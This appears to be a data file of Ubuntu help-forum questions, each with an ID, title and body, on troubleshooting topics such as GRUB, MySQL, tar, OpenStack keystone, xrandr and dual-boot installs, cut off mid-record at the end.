442701	why sometimes grub menu is shown when starting ubuntu server ?	i have installed ubuntu server 12.04 on my device . when i was testing it , i turned on the device and ubuntu was loaded automatically . however , when i moved the device to the workplace and turned it on , it did n't start the server and stayed on the grub menu . there was no timeout so the device did n't start the ubuntu server . also , i did n't make any change in the /etc/default/grub . so i think it would not suddenly show the grub menu . after i rebooted the device , the grub menu did not show and it started the ubuntu server automatically . since there is no keyboard connected , i am sure that it is not related to pressing shift when starting . i am wondering why the menu show and why the menu does n't have the timeout . thanks . the followings are the /etc/default/grub # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
442703	distorted video	when viewing youtube videos , video is distorted like this : flash player is up to date , javascript is enabled , and same issue for firefox and chromium browsers . what to do ?
442711	kernel panic error	i am not able to run any application , due to the fact that my computer hangs , saying `` kernel panic '' . i tried to start the computer in recovery mode , without success . i tried to upgrade the kernel , but still nothing changed . i do n't have a bootable cd or a drive , and also i am unable to transfer my data to an external hard disk due to errors . please help
442712	install win 7 over xp on second hard disc drive	before i get myself into serious trouble i thought i should ask some people who may know . i have researched this but still think i will get into some troubles . a few weeks ago i bit the bullet and switched to ubuntu 12.04 and i must say i do n't want to go back to windows but i have an i-phone that i need to urgently unlock so i need i-tunes . i installed wine but could n't get to to work . i have a second hard disc drive from another pc on my computer with windows xp on it but went about that the wrong way and due to that i of course can not run xp - gives a bsod . i have given in and bought win 7 and burnt the iso file to disc . i was going to unplug hdd1 that has ubuntu on it and just load the cd and see if it will put win7 onto the hdd2 but i bet it is not that simple . can someone offer help .
442713	locale error in apt-get install	it is some days when i have downloaded by sudo apt-get install myprogram . i saw my program finally installed but at the end i see this errors : > locale : can not set lc_ctype to default locale : no such file or directory > locale : can not set lc_messages to default locale : no such file or directory > locale : can not set lc_all to default locale : no such file or directory also my installed program often has different language than english .
442715	ca n't see the username and hostname in terminal	while i 'm opening a new terminal i used to get like this before sysadmin @ system99 : ~ $ but now i get like this below -bash-4.2 $ seems .bashrc issue , so what i copied bashrc from cp /etc/skel/* ~ but this too not yet fixed my issue , how can i fix it ? guide me buddies..
442721	install ubuntu alongside mac os x option only gives me a few 30 gigs	i 'm trying to install ubuntu alongside mac and i have 1 tb of memory . i inserted the install cd , selected a language , and did all that other stuff . when i clicked the `` install ubuntu alongside mac os x '' option then clicked `` install now '' it went to the screen where you size how much memory you want the two operating systems to share . but it only gave me about 30 gigs to size from . i want one to have 500 gigs and the other to have the rest .
442724	vlc media player and youtube playback jerky	i installed vlc media player 2.0.8 on my ubuntu and i tried to play videos on youtube and vlc media player they were jerky . the video stops and sound repeats again and again like a scratched vcd is being played . after 5-8 secs both audio and video restore to normal playback ( for few minutes ) . after that , the same jerky playback for 5-8 secs and again normal playback . this happens randomly not at any particular time of video play . i am using mp4 format 1080p video .
442726	regex search works with `grep -e` but not with bash script ?	i use the same regex with grep and it gives me a match but when doing it in a bash script , it return no match . test string ( part of the file testregex.txt ) : < a href= '' /os_x_lynx-wallpapers.html '' > < p > os x lynx < /p > < img src= '' /thumbs/os_x_lynx-t1.jpg '' alt= '' os x lynx '' class= '' thumb_img '' width= '' 270 '' height= '' 169 '' / > < /a > < /div > < div style= '' float : right ; margin-right:13px ; '' > < /div > < /div > this command correctly matches the highlighted part ( and a few more ) : grep -e ' < img src= '' [ ^ '' ] *\.jpg '' ' testregex.txt but this bash script returns no match : page= $ ( < testregex.txt ) if [ [ $ page =~ ' < img src= '' [ ^ '' ] *\.jpg '' ' ] ] ; then echo $ 1 echo `` match found '' else echo `` match not found ! '' fi
442728	problem on startup on asus eeepc 900 with kingspec ssd	i have an asus eee-pc 900 with 16gb 1.8inch ssd drive . i have installed ubuntu 12.04 on it which works normally but because the performance of the internal ssd disk is very poor i decided to buy a kingspec 32gb 1.8inch ssd from ebay to upgrade it . so , before removing the old disk ( 16gb ) i created an image with fsarchiver by using live cd . i then inserted kingspec ssd and tried to boot again from live cd to restore the image . the problem is that after inserting the kingspec ssd the live cd does not boot.it passes the kernel load screen , tries to read the devices and then suddenly the screen is blank . the ssd is recognized normally from bios . tried with different versions of live cd 's like ubuntu , systemrescuecd , mint , debian and all of them fail to start correctly . then i tried to load windows 7 and xp and both of them get successfully installed on new ssd . is there a possibility that the new ssd can not be correctly recognized by kernel of all distros ? is there a kernel parameter i can try ? thank you
442731	keystoneclient.middleware.auth_token [ - ] configuring auth_uri to point to the public identity endpoint is required	i have installed openstack following the tutorial from http : //ilearnstack.com/2013/04/26/setting-up-a-single-node-openstack-environment/ in a single machine . it is installed successfully . now i am trying to install savanna on openstack , following from https : //savanna.readthedocs.org/en/latest/userdoc/installation.guide.html i have successfully completed step 5 : - savanna-venv/bin/python savanna-venv/bin/savanna-db-manage -- config-file savanna-venv/etc/savanna.conf upgrade head but when i start savanna call savanna-venv/bin/python savanna-venv/bin/savanna-api -- config-file savanna-venv/etc/savanna.conf i get this error , any solution ? warning keystoneclient.middleware.auth_token [ - ] configuring auth_uri to point to the public identity endpoint is required ; clients may not be able to authenticate against an admin endpoint ( 23206 ) wsgi starting up on http : //0.0.0.0:8080/
442732	tar command ca n't find file or directory	i 'm new user of ubuntu 12.04 , and i do n't know what should i do . i had download tor-browser and in instruction it said i should use this command for extracting tar file : tar -xvjf tor-browser-linux64-3.5.3_en-us.tar .xz but it give me this : tar ( child ) : tor-browser-linux64-3.5.3_en-us.tar : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now but that file exist because i use ls command as below : ls downloads tor-browser-linux64-3.5.3_en-us.tar.xz i also use : cd downloads but it did n't work to , where i did it wrong ?
442735	strange screen after booting into ubuntu and before the splash screen	every time i boot into my ubuntu os ( ubuntu 13.10 64 bit ) , before appearing the splash screen , an strange screen is displayed . the behavior of the strange screen is automatically typing something like ^ [ [ 2~^^ [ [ 2~^^ [ [ 2~^^ [ [ 2~^ ... .. the above characters are typed indefinitely till i press the enter button . only after pressing the enter button it goes into the splash screen . presently i 'm using burg bootloader , but the problem remains if i use grub2 as well . the only other os in my laptop is windows 8 which boots normally . my laptop hardware information are as follows : brand : dell model : inspiron 1440 processor : intel core 2 duo memory : 4 gib hdd : 500 gib i faced the same problem with some other linux distro as well as earlier versions of ubuntu too with both 32 bit and 64 bit .
442738	detect broken packages	there are many pages on the web regarding `` how to fix broken packages '' but i can not find a command to find/detect/view the broken packages . i want to search for orphan packages such as lib* .
442740	type password with onboard	i noticed when use pcmanfm in lubuntu 13.10 and i want to open a current folder as root , it will prompt me for password and i ca n't use onboard ( virtual keyboard ) to type the password . it 's pretty annoying that i have to flip the screen around to access the hardward keyboard on my tablet . is there a way to allow me using the software keyboard to type the password ? i assume there might be other applications installed on my tablet that would have the same problem . i have n't tested them all yet . thanks , saigon
442742	how to update dir on svn server	i need to update the whole directory content to svn project . my svn project preset at location /home/svn/baseproject and i want to update the directory present at location /var/www/baseproject/app/controllers/components please tell how could i do it ? please provide ubuntu terminal command to do it .
442745	kubuntu installation	am new to kubuntu . i would like to install it ( 12.04.4 ) on my homepc . i 've got the software . is there any installation guide ? also , to download repositories/packages for installing applications , is there any way to make it offline ? i mean download packages at some place , copying those files to homepc and using commands to install them ? thanks in advance . regards , abe
442746	how to install offline packages on a linux server	i need to install offline packages for a linux server . it is a repellent task because all the time it outputs that the package i want to install needs several other packages . how can i resolve this problem , please ? regards
442750	can not start mysql server	i 'm tring to run a website from my server , so i installed php , apache and mysql . i 'm having problems with mysql . after installation , it failed to restart . this is the output : root @ ns213360 : /etc/mysql # /etc/init.d/mysql start ; tail -n 50 /var/log/syslog [ fail ] starting mysql database server : mysqld . . . . . . . . . . . . . . failed ! apr 3 09:27:22 ns213360 mysqld : 140403 9:27:22 innodb : using linux native aio apr 3 09:27:22 ns213360 mysqld : 140403 9:27:22 innodb : initializing buffer pool , size = 128.0m apr 3 09:27:22 ns213360 mysqld : 140403 9:27:22 innodb : completed initialization of buffer pool apr 3 09:27:22 ns213360 mysqld : 140403 9:27:22 innodb : highest supported file format is barracuda . apr 3 09:27:22 ns213360 mysqld : 140403 9:27:22 innodb : waiting for the background threads to start apr 3 09:27:23 ns213360 mysqld : 140403 9:27:23 innodb : 5.5.35 started ; log sequence number 1595685 apr 3 09:27:23 ns213360 mysqld : 140403 9:27:23 [ error ] /usr/sbin/mysqld : unknown variable 'default-character-set=utf8' apr 3 09:27:23 ns213360 mysqld : 140403 9:27:23 [ error ] aborting apr 3 09:27:23 ns213360 mysqld : apr 3 09:27:23 ns213360 mysqld : 140403 9:27:23 innodb : starting shutdown ... apr 3 09:27:24 ns213360 mysqld : 140403 9:27:24 innodb : shutdown completed ; log sequence number 1595685 apr 3 09:27:24 ns213360 mysqld : 140403 9:27:24 [ note ] /usr/sbin/mysqld : arrêt du serveur terminé apr 3 09:27:24 ns213360 mysqld : apr 3 09:27:24 ns213360 mysqld_safe : mysqld from pid file /var/run/mysqld/mysqld.pid ended apr 3 09:27:36 ns213360 /etc/init.d/mysql [ 24960 ] : 0 processes alive and '/usr/bin/mysqladmin -- defaults-file=/etc/mysql/debian.cnf ping ' resulted in apr 3 09:27:36 ns213360 /etc/init.d/mysql [ 24960 ] : # 007/usr/bin/mysqladmin : connect to server at 'localhost ' failed apr 3 09:27:36 ns213360 /etc/init.d/mysql [ 24960 ] : error : 'ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) ' apr 3 09:27:36 ns213360 /etc/init.d/mysql [ 24960 ] : check that mysqld is running and that the socket : '/var/run/mysqld/mysqld.sock ' exists ! apr 3 09:27:36 ns213360 /etc/init.d/mysql [ 24960 ] : apr 3 09:28:01 ns213360 /usr/sbin/cron [ 24980 ] : ( root ) cmd ( /usr/local/rtm/bin/rtm 40 > /dev/null 2 > /dev/null ) apr 3 09:29:01 ns213360 /usr/sbin/cron [ 25025 ] : ( root ) cmd ( /usr/local/rtm/bin/rtm 40 > /dev/null 2 > /dev/null ) apr 3 09:29:19 ns213360 mysqld_safe : starting mysqld daemon with databases from /var/lib/mysql apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 [ warning ] using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release . please use the full name instead . apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 [ warning ] the syntax ' -- log-slow-queries ' is deprecated and will be removed in a future release . please use ' -- slow-query-log'/ ' -- slow-query-log-file ' instead . apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 [ error ] an old style -- language value with language specific part detected : /usr/share/mysql/french/ apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 [ error ] use -- lc-messages-dir without language specific part instead . apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 [ note ] plugin 'federated ' is disabled . apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 innodb : the innodb memory heap is disabled apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 innodb : mutexes and rw_locks use gcc atomic builtins apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 innodb : compressed tables use zlib 1.2.7 apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 innodb : using linux native aio apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 innodb : initializing buffer pool , size = 128.0m apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 innodb : completed initialization of buffer pool apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 innodb : highest supported file format is barracuda . apr 3 09:29:19 ns213360 mysqld : 140403 9:29:19 innodb : waiting for the background threads to start apr 3 09:29:20 ns213360 mysqld : 140403 9:29:20 innodb : 5.5.35 started ; log sequence number 1595685 apr 3 09:29:20 ns213360 mysqld : 140403 9:29:20 [ error ] /usr/sbin/mysqld : unknown variable 'default-character-set=utf8' apr 3 09:29:20 ns213360 mysqld : 140403 9:29:20 [ error ] aborting apr 3 09:29:20 ns213360 mysqld : apr 3 09:29:20 ns213360 mysqld : 140403 9:29:20 innodb : starting shutdown ... apr 3 09:29:21 ns213360 mysqld : 140403 9:29:21 innodb : shutdown completed ; log sequence number 1595685 apr 3 09:29:21 ns213360 mysqld : 140403 9:29:21 [ note ] /usr/sbin/mysqld : arrêt du serveur terminé apr 3 09:29:21 ns213360 mysqld : apr 3 09:29:21 ns213360 mysqld_safe : mysqld from pid file /var/run/mysqld/mysqld.pid ended apr 3 09:29:33 ns213360 /etc/init.d/mysql [ 25685 ] : 0 processes alive and '/usr/bin/mysqladmin -- defaults-file=/etc/mysql/debian.cnf ping ' resulted in apr 3 09:29:33 ns213360 /etc/init.d/mysql [ 25685 ] : # 007/usr/bin/mysqladmin : connect to server at 'localhost ' failed apr 3 09:29:33 ns213360 /etc/init.d/mysql [ 25685 ] : error : 'ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) ' apr 3 09:29:33 ns213360 /etc/init.d/mysql [ 25685 ] : check that mysqld is running and that the socket : '/var/run/mysqld/mysqld.sock ' exists ! apr 3 09:29:33 ns213360 /etc/init.d/mysql [ 25685 ] :
442754	how do i fix 'jekyll : command not found ' error permanently ?	i 've installed ruby , rvm , and jekyll following this tutorial and everything works fine after following those steps . my issue is that each time i open a new terminal window and want jekyll to rebuild the site with jekyll build , i get the error jekyll : command not found . the temporary solution is to re-run the following two commands from the tutorial then jekyll works : [ [ -s `` $ home/.profile '' ] ] & & source `` $ home/.profile '' [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & source `` $ home/.rvm/scripts/rvm '' checking that .profile file i noticed it says 'this file is not read by bash , if ~/.bash_profile or ~/.bash_login exists ' . i ran the first two commands again substituting .bash_profile for .profile and this did n't seem to have any effect . [ [ -s `` $ home/.bash_profile '' ] ] & & source `` $ home/.bash_profile '' i still get the jekyll error and my .bash_profile file exists but is completely empty . is there a more permanent fix or am i stuck running the first two commands every single time i open a terminal to rebuild a site with jekyll ?
442756	different backup through deja dup	since ubuntu one is being dropped , i will have to make my system backup elsewhere . i asume that in deja dup , in the storage tab , the backup location ubuntu one , will no longer be available . my question is , what can i use in place of the ubuntu one . dropbox or preferably mega , or anything else that allows me to make a backup online ?
442758	google chrome installation	how do i install google chrome on my ubuntu 13.10 easily ? i had downloaded the file called google-chrome-stable_current_i386.deb from google downloads but it doesnot install using ubuntu software center .
442760	how do i use keystone from terminal	i have installed openstack grizzly on my ubuntu server 12.04 installed in vmware i want to use keystone and when i command keystone user-list it give this expecting authentication method via either a service token , -- os-token or env [ os_service_token ] , or credentials , -- os-username or env [ os_username ] . i want to ask how do i specify these credentials ?
442764	unexpected termination of bind in ubuntu 10.04.4 lts	i 've got a vps ubuntu 10.04.4 lts with all kinds of servers on it . one in particular is bind9 which from time to time is stopped without any reason . for instance it was stopped yesterday which i started it manually ( through ssh ) . but today i woke up to find the same daemon to be stopped . i 'll be grateful if someone could guide me to the right direction how to start debugging this problem .
442766	tmux [ exited ] on startup	i recently installed tmux and became really glad for it . all of a sudden i though it would start throwing an error when i try to create a new session from within my terminal : tmux new -s my-session will cause the application to crash and only return [ exited ] and put the following on the next command line : 62 ; 9 ; c being new to tmux i have no idea how to fix this issue . does anybody recognize this error and knows how to fix it ?
442772	installation instructions for dual boot ubuntu and windows	i 've completed a new build and i would like to make it a windows 7 and ubuntu dual boot system . i am brand new to linux and , while i have done a lot of research into ways to partition my drives and so on , i am not super clear on how to do the installs properly . i want to get these installs right the first time , so i am hoping someone can give me a clear step-by-babystep to guide me through this process . please remember i 'm a newbie with linux and with installing os 's in general : ) i have brand new drives and am going to be doing clean installs . my basic understanding is : install windows first . use the windows installer to set up the windows system partition on the ssd and the ntfs data partition on the hdd , leave the remaining spaces unallocated for now . install ubuntu next . use the installer ( grub if i 'm not mistaken ) to set up the ubuntu partitions on ssd and hdd , choosing where to mount each partition ( / , /home , etc ) . ? ? ? the os 's are now installed ... set up symlinks , mounts , and so on if it 's any more complicated than i described in 1 ) and 2 ) ( which i 'm 100 % sure it is ) , then i could really use some guidance on the finer details : what to do and when to do it , things to make sure of , boxes to check , etc , etc . my motherboard is an asus z87 pro , which i believe is uefi . i 've read that uefi may require special care in installing windows and linux for dual boot ( have to use gpt partitions , etc ) . what are the steps and things to check in each installation process for this situation ? i intend to have both os 's on an ssd ( 120gb samsung 840 evo ) , with data and a couple other partitions on an hdd ( 1tb caviar blue ) my intended partition scheme ( assuming gpt partitions , which may be a bad assumption ? ) : ssd - 120gb ( samsung 840 evo ) : [ c : ] 80gb ( ntfs ) - > windows system partition [ sda1 ] 20gb ( ext4 ) - > / [ sda2 ] 15gb ( ext4 ) - > /home ... ( moving folders for docs , media files , to hdd ) hdd - 1tb ( western digital caviar blue ) [ d : ] ~800gb ( ntfs ) - > ntfs data partition ( windows and os-shared data ) [ sdb2 ] ~100gb ( ext4 ) - > ubuntu-only data partition [ sdb3 ] 2gb ( ext4 ) - > /var [ sdb4 ] 4gb ( ext4 ) - > /tmp [ sdb5 ] 8gb ( ext4 ) - > /swap ( = my 8gb ram for hibernation ) ( if you have comments on my scheme , i 'd appreciate hearing them , but that 's not the point of this question ) a clear walkthrough of the installation processes for my case would be extremely appreciated . thank you !
442773	scheduling torrents in transmission - using wd my cloud	is there a way that i can schedule downloads in the transmission app to take place only during certain hours of the day . for example : from 19:00 - 08:00 that way when i use my internet the most it is n't being used up by downloads .
442774	xrandr modes not set at login	in my setup ( pxe-boot/kdm/openbox ) , the resolutions are added after login . it is difficult to describe the complete setup , so i will ask more generally . which process is responsible for adding the resolutions to xrandr and how is this triggered , respecively why is it triggered that late ? the problem exist since 13.10 , in 13.4 everything went well ... # lspci|grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) here are the compared xorg logs from 13.04 and 13.10 13.04 ( ii ) intel ( 0 ) : creating default display subsection in screen section '' default screen section '' for depth/fbbpp 24/32 ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 ( == ) intel ( 0 ) : rgb weight 888 ( == ) intel ( 0 ) : default visual is truecolor ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) sandybridge desktop ( gt1 ) ( -- ) intel ( 0 ) : cpu : x86-64 , sse2 , sse3 , ssse3 , sse4.1 , sse4.2 , avx ( ** ) intel ( 0 ) : framebuffer tiled ( ** ) intel ( 0 ) : pixmaps tiled ( ** ) intel ( 0 ) : `` tear free '' disabled ( ** ) intel ( 0 ) : forcing per-crtc-pixmaps ? no ( ii ) intel ( 0 ) : output vga1 has no monitor section ( ii ) intel ( 0 ) : output hdmi1 has no monitor section ( ii ) intel ( 0 ) : output dp1 has no monitor section ( ii ) intel ( 0 ) : edid for output vga1 ( ii ) intel ( 0 ) : printing probed modes for output vga1 ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz e ) ( ii ) intel ( 0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz e ) ( ii ) intel ( 0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz e ) ( ii ) intel ( 0 ) : modeline `` 848x480 '' x60.0 33.75 848 864 976 1088 480 486 494 517 +hsync +vsync ( 31.0 khz e ) ( ii ) intel ( 0 ) : modeline `` 640x480 '' x59.9 25.18 640 656 752 800 480 489 492 525 -hsync -vsync ( 31.5 khz e ) ( ii ) intel ( 0 ) : edid for output hdmi1 ( ii ) intel ( 0 ) : manufacturer : hwp model : 2683 serial # : 16843009 ( ii ) intel ( 0 ) : year : 2007 week : 31 ( ii ) intel ( 0 ) : edid version : 1.3 ( ii ) intel ( 0 ) : digital display input ( ii ) intel ( 0 ) : max image size [ cm ] : horiz . : 38 vert . : 30 ( ii ) intel ( 0 ) : gamma : 2.20 ( ii ) intel ( 0 ) : dpms capabilities : standby suspend off ( ii ) intel ( 0 ) : supported color encodings : rgb 4:4:4 ycrcb 4:4:4 ( ii ) intel ( 0 ) : default color space is primary color space ( ii ) intel ( 0 ) : first detailed timing is preferred mode ( ii ) intel ( 0 ) : redx : 0.640 redy : 0.330 greenx : 0.300 greeny : 0.600 ( ii ) intel ( 0 ) : bluex : 0.150 bluey : 0.060 whitex : 0.313 whitey : 0.329 ( ii ) intel ( 0 ) : supported established timings : ( ii ) intel ( 0 ) : 720x400 @ 70hz ( ii ) intel ( 0 ) : 640x480 @ 60hz ( ii ) intel ( 0 ) : 640x480 @ 72hz ( ii ) intel ( 0 ) : 640x480 @ 75hz ( ii ) intel ( 0 ) : 800x600 @ 60hz ( ii ) intel ( 0 ) : 800x600 @ 72hz ( ii ) intel ( 0 ) : 800x600 @ 75hz ( ii ) intel ( 0 ) : 832x624 @ 75hz ( ii ) intel ( 0 ) : 1024x768 @ 60hz ( ii ) intel ( 0 ) : 1024x768 @ 70hz ( ii ) intel ( 0 ) : 1024x768 @ 75hz ( ii ) intel ( 0 ) : 1280x1024 @ 75hz ( ii ) intel ( 0 ) : 1152x864 @ 75hz ( ii ) intel ( 0 ) : manufacturer 's mask : 0 ( ii ) intel ( 0 ) : supported standard timings : ( ii ) intel ( 0 ) : # 0 : hsize : 1280 vsize 1024 refresh : 60 vid : 32897 ( ii ) intel ( 0 ) : supported detailed timing : ( ii ) intel ( 0 ) : clock : 108.0 mhz image size : 376 x 301 mm ( ii ) intel ( 0 ) : h_active : 1280 h_sync : 1328 h_sync_end 1440 h_blank_end 1688 h_border : 0 ( ii ) intel ( 0 ) : v_active : 1024 v_sync : 1025 v_sync_end 1028 v_blanking : 1066 v_border : 0 ( ii ) intel ( 0 ) : ranges : v min : 56 v max : 76 hz , h min : 30 h max : 83 khz , pixclock max 145 mhz ( ii ) intel ( 0 ) : monitor name : hp l1940t ( ii ) intel ( 0 ) : serial no : cnk7310n9y ( ii ) intel ( 0 ) : edid ( in hex ) : ( ii ) intel ( 0 ) : 00ffffffffffff0022f0832601010101 ( ii ) intel ( 0 ) : 1f11010380261e78eeee95a3544c9926 ( ii ) intel ( 0 ) : 0f5054adef8081800101010101010101 ( ii ) intel ( 0 ) : 010101010101302a009851002a403070 ( ii ) intel ( 0 ) : 1300782d1100001e000000fd00384c1e ( ii ) intel ( 0 ) : 530e000a202020202020000000fc0048 ( ii ) intel ( 0 ) : 50204c31393430540a0a0a0a000000ff ( ii ) intel ( 0 ) : 00434e4b373331304e39590a2020006e ( ii ) intel ( 0 ) : printing probed modes for output hdmi1 ( ii ) intel ( 0 ) : modeline `` 1280x1024 '' x60.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz ep ) ( ii ) intel ( 0 ) : modeline `` 1280x1024 '' x75.0 135.00 1280 1296 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 80.0 khz e ) ( ii ) intel ( 0 ) : modeline `` 1152x864 '' x75.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync ( 67.5 khz e ) ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x75.1 78.80 1024 1040 1136 1312 768 769 772 800 +hsync +vsync ( 60.1 khz e ) ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x70.1 75.00 1024 1048 1184 1328 768 771 777 806 -hsync -vsync ( 56.5 khz e ) ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz e ) ( ii ) intel ( 0 ) : modeline `` 832x624 '' x74.6 57.28 832 864 928 1152 624 625 628 667 -hsync -vsync ( 49.7 khz e ) ( ii ) intel ( 0 ) : modeline `` 800x600 '' x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync ( 48.1 khz e ) ( ii ) intel ( 0 ) : modeline `` 800x600 '' x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync ( 46.9 khz e ) ( ii ) intel ( 0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz e ) ( ii ) intel ( 0 ) : modeline `` 640x480 '' x72.8 31.50 640 664 704 832 480 489 491 520 -hsync -vsync ( 37.9 khz e ) ( ii ) intel ( 0 ) : modeline `` 640x480 '' x75.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync ( 37.5 khz e ) ( ii ) intel ( 0 ) : modeline `` 640x480 '' x60.0 25.20 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz e ) ( ii ) intel ( 0 ) : modeline `` 720x400 '' x70.1 28.32 720 738 846 900 400 412 414 449 -hsync +vsync ( 31.5 khz e ) ( ii ) intel ( 0 ) : edid for output dp1 ( ii ) intel ( 0 ) : output vga1 connected ( ii ) intel ( 0 ) : output hdmi1 connected ( ii ) intel ( 0 ) : output dp1 disconnected ( ii ) intel ( 0 ) : using fuzzy aspect match for initial modes ( ii ) intel ( 0 ) : output vga1 using initial mode 1024x768 ( ii ) intel ( 0 ) : output hdmi1 using initial mode 1024x768 ( ii ) intel ( 0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . ( == ) intel ( 0 ) : dpi set to ( 96 , 96 ) 13.10 ( ii ) intel ( 0 ) : creating default display subsection in screen section '' default screen section '' for depth/fbbpp 24/32 ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 ( == ) intel ( 0 ) : rgb weight 888 ( == ) intel ( 0 ) : default visual is truecolor ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) hd graphics 2000 ( -- ) intel ( 0 ) : cpu : x86-64 , sse2 , sse3 , ssse3 , sse4.1 , sse4.2 , avx ( ** ) intel ( 0 ) : framebuffer tiled ( ** ) intel ( 0 ) : pixmaps tiled ( ** ) intel ( 0 ) : `` tear free '' disabled ( ** ) intel ( 0 ) : forcing per-crtc-pixmaps ? no ( ii ) intel ( 0 ) : output vga1 has no monitor section ( ii ) intel ( 0 ) : output hdmi1 has no monitor section ( ii ) intel ( 0 ) : output dp1 has no monitor section ( ii ) intel ( 0 ) : output virtual1 has no monitor section ( -- ) intel ( 0 ) : output vga1 using initial mode 1024x768 on pipe 0 ( -- ) intel ( 0 ) : output hdmi1 using initial mode 1280x1024 on pipe 1 ( == ) intel ( 0 ) : dpi set to ( 96 , 96 )
442778	support touchscreen with virtualbox 4.3.6	i 'm using virtualbox 4.3.6 from the trusty contrib packages . this version supposedly supports touchscreens , however touching the screen in a windows 8.1 guest will only bring the fullscreen vm all the way to the back of all windows .
442780	saving ssl password for svn in ubuntu	i have tried to set up my svn that way , that it saves my passwords , but for some reason it wo n't work . i am using a ssl certificate , for which i need to provide a password every time . i have tried setting it up in ~/.subversion/servers file : [ mygroup ] ssl-client-cert-file = /mnt/data/myuser/certificate.pk12 store-passwords = yes store-plaintext-passwords = yes store-ssl-client-cert-pp-plaintext = yes the file is correct , it finds the correct path and ask for the password . some time before when i tried this , it asked me if i want to store the ssl key and the password permanently , i gave yes all the time . the ssl key is remembered , but the password not . and now it does not even ask to remember it . it simply asks everytime . i tried a lot of settings , none worked . any ideas ? thanks
442784	wifi problem on arm ubuntu	i 'm using ubuntu 13.10 on an arm device ( an android phone ) . the ifconfig output shows that the wireless is recognized as ethernet ( eth0 ) instead of wlan . so i 'm not able to put my device on monitoring mode or using aircrack-ng . is there any way to solve this problem ?
442785	problem with installing codeblocks on ubuntu	i was trying to install codeblocks on my pc , i just follow the official wiki , and then i encountered a problem just like below , what should i do next to solve these problems ? -- -- -- -- -- -- -updates so sorry for not narrating clearly , the wiki is from codeblocks ' official website : http : //wiki.codeblocks.org/index.php ? title=installing_code : :blocks_nightly_build_on_ubuntu . the version of code : :blocks in the ubuntu software center is too old , that 's why i did n't choose it . i used the instructions from codeblocks ' official website to install codeblocks successfully and it runs normally , but today when i clicked the icon it reacted nothing , and that 's why i tried to reinstall it . yuyue @ thinkpad : ~/downloads/debian-stable/amd64 $ sudo dpkg -i *.deb dpkg-deb : error : `amd64.deb ' is not a debian format archive dpkg : error processing amd64.deb ( -- install ) : subprocess dpkg-deb -- control returned error exit status 2 selecting previously unselected package codeblocks . ( reading database ... 299683 files and directories currently installed . ) unpacking codeblocks ( from codeblocks_13.12-1_amd64.deb ) ... preparing to replace codeblocks-common 13.12-1 ( using codeblocks-common_13.12-1_all.deb ) ... unpacking replacement codeblocks-common ... selecting previously unselected package codeblocks-contrib . unpacking codeblocks-contrib ( from codeblocks-contrib_13.12-1_amd64.deb ) ... preparing to replace codeblocks-contrib-common 13.12-1 ( using codeblocks-contrib-common_13.12-1_all.deb ) ... unpacking replacement codeblocks-contrib-common ... selecting previously unselected package codeblocks-contrib-dbg . unpacking codeblocks-contrib-dbg ( from 